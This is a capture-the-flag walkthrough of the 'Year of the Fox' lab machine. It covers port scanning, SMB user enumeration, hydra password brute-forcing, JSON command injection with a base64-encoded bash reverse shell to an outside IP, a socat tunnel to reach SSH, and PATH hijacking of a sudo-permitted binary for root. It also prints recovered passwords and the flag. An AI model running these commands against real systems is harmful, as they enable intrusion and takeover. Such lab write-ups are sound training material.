Year of the Fox

Reconnaissance

No description is given for this machine, so let's start with an aggressive scan

NMAP output
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-27 12:12 CET
Warning: 10.10.47.18 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.47.18
Host is up (0.059s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-auth:
| HTTP/1.1 401 Unauthorized
|_  Basic realm=You want in? Gotta guess the password!
|_http-title: 401 Unauthorized
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX)
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: year-of-the-fox.lan, YEAR-OF-THE-FOX

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: YEAR-OF-THE-FOX, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown)
| smb2-time:
|   date: 2021-12-27T11:13:09
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: year-of-the-fox
|   NetBIOS computer name: YEAR-OF-THE-FOX
|   Domain name: lan
|   FQDN: year-of-the-fox.lan
|_  System time: 2021-12-27T11:13:09+00:00

TRACEROUTE (using port 23/tcp)
HOP RTT       ADDRESS
1   155.92 ms 10.8.0.1
2   156.21 ms 10.10.47.18

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.80 seconds

So we have a web application on port 80 that requires credentials to enter and a samba share. Before trying to bruteforce the web app let's see what's in the samba port.

smbclient -L /10.10.47.18/
Password for [WORKGROUP\max]:

        Sharename       Type      Comment
        ---------       ----      -------
        yotf            Disk      Fox's Stuff -- keep out!
        IPC$            IPC       IPC Service (year-of-the-fox server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
max@1337 ~/yotf> smbclient //10.10.47.18/yotf
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\max]:
tree connect failed: NT_STATUS_ACCESS_DENIED

Well that's unlucky, and we still need some users to bruteforce the login in the web app, so let's move to the scanning part.

Scanning

First tool we are gonna use here is enum4linux, as maybe we can get some samba users with it.

perl enum4linux.pl 10.10.47.18
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\fox (Local User)
S-1-22-1-1001 Unix User\rascal (Local User)

Perfect, now we have 2 users to bruteforce the web app login with. Fox is a bit too obvious, so I'm gonna start with rascal first. I'm going to use hydra for this as I previously used in Internal CTF.

hydra -l rascal -P ../rockyou.txt 10.10.47.18 http-get -t 30 -I
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-27 12:29:49
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 30 tasks per 1 server, overall 30 tasks, 14344398 login tries (l:1/p:14344398), ~478147 tries per task
[DATA] attacking http-get://10.10.47.18:80/
[80][http-get] host: 10.10.47.18   login: rascal   password: april19
1 of 1 target successfully completed, 1 valid password found

Finally we have something to work with, let's analyze the web app now.

We are greeted with a php website that takes a string, creates a JSON payload and apparently searches for it

Exploiting

After searching a bit, looks like there could be JSON OS code injection due to insecure input sanitizing as per this website, so let's see if thats true.

Trying manual payloads in the website auto changes some characters like "/" to null char, so let's fire Burp and try it.

So after a long list of payloads tried, finally I found a valid way to inject OS commands, now we just have to scale it to a reverse shell.

Trying the usual reverse shell payloads brings ["Invalid Character"], so looks like we will have to transform it to B64 and make the server decode it while piping it to bash, so let's get to it.

echo 'bash -i >& /dev/tcp/10.8.208.63/1337 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIwOC42My8xMzM3IDA+JjEK

Perfect, now we are in, grab the web flag from /var/www, and we can start the privilege escalation to root.

Privilege Escalation

After not finding anything in the usual directories in the filesystem, I decided to try linpeas.

cat /etc/ssh/sshd_config
#       $OpenBSD: sshd_config,v 1.101 2017/03/14 07:19:07 djm Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

#Port 22
#AddressFamily any
ListenAddress 127.0.0.1
AllowUsers fox

Looks like ssh is only available to localhost, and to user fox, so let's reverse tunnel and bring that ssh service to our pc so we can bruteforce knowning the user. As we don't have any ssh user yet, we can't user SSH -L, so let's try with socat.

www-data@year-of-the-fox:/tmp$ ./socat TCP-LISTEN:2222,fork TCP:127.0.0.1:22
max@1337 ~/yotf [1]> socat - TCP:10.10.47.18:2222
hydra -l fox -P rockyou.txt ssh://10.10.47.18:2222 -t 30 -I
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-27 13:34:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 30 tasks per 1 server, overall 30 tasks, 14344398 login tries (l:1/p:14344398), ~478147 tries per task
[DATA] attacking ssh://10.10.47.18:2222/
[STATUS] 334.00 tries/min, 334 tries in 00:01h, 14344068 to do in 715:47h, 30 active
[2222][ssh] host: 10.10.47.18   login: fox   password: allison
^C⏎ 
max@1337 ~> ssh fox@10.10.47.18 -p 2222
fox@10.10.47.18's password:


        __   __                       __   _   _            _____
        \ \ / /__  __ _ _ __    ___  / _| | |_| |__   ___  |  ___|____  __
         \ V / _ \/ _` | '__|  / _ \| |_  | __| '_ \ / _ \ | |_ / _ \ \/ /
          | |  __/ (_| | |    | (_) |  _| | |_| | | |  __/ |  _| (_) >  <
          |_|\___|\__,_|_|     \___/|_|    \__|_| |_|\___| |_|  \___/_/\_\



fox@year-of-the-fox:~$

Perfect, now we are a more privileged user in the server, let's see what else we can enumerate now.

sudo -l
Matching Defaults entries for fox on year-of-the-fox:
    env_reset, mail_badpass

User fox may run the following commands on year-of-the-fox:
    (root) NOPASSWD: /usr/sbin/shutdown

So after a while this is all I discovered, there's no entry for it on GTFOBins so that made me guess perhaps it's a custom binary.

Let's transfer it to our attacking machine to inspect it, you can do it like this

cp /usr/sbin/shutdown .
fox@year-of-the-fox:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.8.208.63 - - [27/Dec/2021 12:42:03] "GET /shutdown HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
fox@year-of-the-fox:~$
max@1337 ~/yotf [6]> wget http://10.10.47.18:8000/shutdown
--2021-12-27 13:42:03--  http://10.10.47.18:8000/shutdown
Connecting to 10.10.47.18:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8304 (8.1K) [application/octet-stream]
Saving to: ‘shutdown’

shutdown                                                   100%[========================================================================================================================================>]   8.11K  --.-KB/s    in 0s

2021-12-27 13:42:03 (67.2 MB/s) - ‘shutdown’ saved [8304/8304]

max@1337 ~/yotf> strings shutdown
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
AWAVI
AUATL
[]A\A]A^A_
poweroff
;*3$"
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7698
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
shutdown.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

So it looks like it's actually just doing a system call to poweroff, that means we can just override the binary with the bash one and invoke it as root.

fox@year-of-the-fox:~$ cd /tmp
fox@year-of-the-fox:/tmp$ cp /bin/bash /tmp/poweroff
fox@year-of-the-fox:/tmp$ chmod +x poweroff
fox@year-of-the-fox:/tmp$ export PATH=/tmp:$PATH
fox@year-of-the-fox:/tmp$ sudo -l
Matching Defaults entries for fox on year-of-the-fox:
    env_reset, mail_badpass

User fox may run the following commands on year-of-the-fox:
    (root) NOPASSWD: /usr/sbin/shutdown
fox@year-of-the-fox:/tmp$ sudo /usr/sbin/shutdown
root@year-of-the-fox:/tmp# cd /root
root@year-of-the-fox:/root# ls
root.txt
root@year-of-the-fox:/root# cat root.txt
Not here -- go find!
root@year-of-the-fox:/root# find / -name root.* 2>/dev/null
/root/root.txt
root@year-of-the-fox:/root# find / -name *.root 2>/dev/null
/home/rascal/.did-you-think-I-was-useless.root
root@year-of-the-fox:/root# cat /home/rascal/.did-you-think-I-was-useless.root
T
H
M
{ODM3NTdk
MDljYmM4Z
jdhZWFhY2
VjY2Fk}

Here's the prize:

YTAyNzQ3ODZlMmE2MjcwNzg2NjZkNjQ2Nzc5NzA0NjY2Njc2NjY4M2I2OTMyMzIzNTNhNjk2ODMw
Mwo=

Good luck!

This one took a bit of time, but finally rooted, hope you enjoyed it!

On this page
ReconnaissanceScanningExploitingPrivilege Escalation